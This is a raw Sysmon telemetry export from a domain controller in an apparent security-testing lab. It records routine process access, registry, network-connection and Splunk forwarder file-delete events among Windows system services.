ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\Global Catalog Promotion CompleteDWORD (0x00000001) 354300x80000000000000003365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.811{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49717-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.811{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49717-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.810{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49716-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.810{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49716-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.744{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49715-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.744{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49715-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.731{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49714-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.731{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49714-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.725{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49713-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.725{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49713-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.724{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49712-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.724{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49712-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.722{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59225- 354300x80000000000000003352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.718{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59548- 354300x80000000000000003351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.717{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60228- 354300x80000000000000003350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.716{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64536- 354300x80000000000000003349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62551- 354300x80000000000000003348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49711-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49711-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.714{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60475- 354300x80000000000000003345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.713{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59146- 354300x80000000000000003344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.712{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59456- 354300x80000000000000003343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.710{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61913- 354300x80000000000000003342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.707{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54366- 354300x80000000000000003341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.706{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49710-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.706{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49710-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64177- 354300x80000000000000003338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.704{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62870- 354300x80000000000000003337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49709-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49709-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55032- 354300x80000000000000003334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.701{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55187- 354300x80000000000000003333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.699{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49707-false93.184.220.29-80http 354300x80000000000000003332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.699{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60851- 354300x80000000000000003331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.699{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49708-false93.184.220.29-80http 354300x80000000000000003330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.698{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62151- 354300x80000000000000003329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.696{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56045- 354300x80000000000000003328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.694{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local49214- 354300x80000000000000003327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.694{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57717- 354300x80000000000000003326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.692{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58852- 354300x80000000000000003325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.690{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60084- 354300x80000000000000003324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60579- 354300x80000000000000003323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.687{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58438- 354300x80000000000000003322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.685{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local54221-false127.0.0.1win-dc-892.attackrange.local53domain 354300x80000000000000003321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.685{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49706-false10.0.1.14win-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.685{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49706-false10.0.1.14win-dc-892.attackrange.local445microsoft-ds 354300x80000000000000003319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.684{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55101- 354300x80000000000000003318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.684{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54221- 354300x80000000000000003317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local62468-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62468- 354300x80000000000000003315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:f8e0:fca5:d9d:ffff-62468-truea00:10e:0:0:0:0:0:0win-dc-892.attackrange.local53domain 354300x80000000000000003314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54227- 354300x80000000000000003313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local54227-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000003312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.683{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54737- 354300x80000000000000003311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.682{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62177- 354300x80000000000000003310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.682{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55707- 354300x80000000000000003309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.681{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1win-dc-892.attackrange.local60002-false127.0.0.1win-dc-892.attackrange.local53domain 354300x80000000000000003308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.680{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local49570-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 23542300x80000000000000003307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=68BCDF1212B476DB3583BD35A962B691,SHA256=7BEAC708211278D0A0B6C5C8C3F194B3E379B1696BDA8D3B87FA29AD891D2AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C14C7F7EF4E5190AD9926D274E795681,SHA256=1998D7A8CB0081120B54BD052BBA01D6B616C9CEE96B21CFE6FB08E58C6351DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=94A01CC7FED522AC3153C5C2B16D3D98,SHA256=09CD46DCD7DA97E8524AE424136F3CCA8DF0ABCE9BD558E78B21903AB9F1E996,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=097D02346A2F243F2F9F9B23369B6BA8,SHA256=A73424EAB4075B4DFADE17BA9A2BC95527506D67BF375A67088400F29B474F7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7ACB7320EB5535B07F2FB54A2B050244,SHA256=703C0341B6D7810365CACE887F8110ECDCA7BF917825A088ECD52D784909E96E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.877{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=083ABA005816275FBAEC2BF1B5E7E62B,SHA256=8F2386522B3BCA2CFC5A05D2B6B424383752276D0793045B8CF10207653FBA14,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.304{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56960- 354300x80000000000000003300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.303{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56960-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 354300x80000000000000003299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.303{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49704-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.303{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49704-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000003297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.275{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61421- 354300x80000000000000003296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.275{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61421-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 354300x80000000000000003295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.226{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49703-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 